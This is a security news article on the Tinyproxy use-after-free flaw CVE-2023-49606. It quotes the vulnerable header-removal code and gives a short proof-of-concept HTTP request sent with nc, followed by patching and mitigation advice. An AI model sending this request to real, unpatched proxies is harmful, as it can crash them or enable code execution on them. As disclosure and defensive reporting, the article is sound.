A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.
The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.
This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.
Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.
Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:
If you want to test all these features now with completely free access to the sandbox:
Despite its benefits, this vulnerability highlights a severe risk of its deployment, especially in security-sensitive environments.
The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.
Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.
This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free
.
Tinyproxy does exactly that in the remove_connection_headers() function:
static int remove_connection_headers (orderedmap hashofheaders)
{
static const char *headers[] = {
"connection",
"proxy-connection"
};
for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
/* Look for the connection header. If it's not found, return. */ data = orderedmap_find(hashofheaders,headers[i]); (1)
if (!data)
return 0; (2)
...
ptr = data;
while (ptr < data + len) {
orderedmap_remove (hashofheaders, ptr); (3)
...
}
/* Now remove the connection header it self. */ orderedmap_remove (hashofheaders, headers[i]); (4)
}
return 0;
}
Exploit Proof of Concept
As mentioned, the PoC for the vulnerability is a very simple HTTP request. One variation is:
GET / HTTP/1.1
Connection: Connection
Host: 192.168.86.166:8000
Assuming there is an actual host at 192.168.86.166:8000, one can do:
cat heap-uaf.poc | nc 127.0.0.1 8888
With the relevant tinyproxy.config being:
Port 8888
Listen 127.0.0.1
The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.
Following the discovery, patches and updates were swiftly released to mitigate the risk.
Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.
For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.
Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.
Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.
Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.
While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.
Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide
Fukui Prefectural Police have indicted a 15-year-old junior high school student from Saitama Prefecture for…
GitLab, a widely used platform for DevOps lifecycle management, has released critical security updates for…
Mozilla has officially launched Firefox 133.0, offering enhanced features, significant performance improvements, and critical security…
In a new wave of cyberattacks, the Russia-aligned hacking group "RomCom" has been found exploiting…
Earth Estries, a Chinese APT group, has been actively targeting critical sectors like telecommunications and…
A critical security vulnerability has been discovered in the popular WordPress plugin Anti-Spam by CleanTalk, which…